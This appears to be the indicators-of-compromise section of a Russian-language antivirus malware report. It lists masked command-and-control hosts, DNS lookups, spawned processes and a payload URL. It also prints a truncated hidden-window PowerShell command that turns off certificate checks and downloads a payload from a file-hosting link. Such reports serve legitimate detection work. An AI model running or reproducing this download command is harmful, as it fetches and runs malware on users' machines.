Техническая информация
- https://pixeldrain.com/api/file/vfgpbptv
- <SYSTEM32>\svchost.exe
- 'no######1061.portmap.host':51061
- 'pi###drain.com':443
- 'ip###ger.org':443
- DNS ASK pi###drain.com
- DNS ASK ip###ger.org
- DNS ASK no######1061.portmap.host
- '<SYSTEM32>\ping.exe' pixeldrain.com' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $kUGeBj='';[Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$qzTBrWbFLX=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/vFGPbpTV');for ($i=0;$i -l...' (со скрытым окном)
- '<SYSTEM32>\ping.exe' pixeldrain.com
- '<SYSTEM32>\svchost.exe'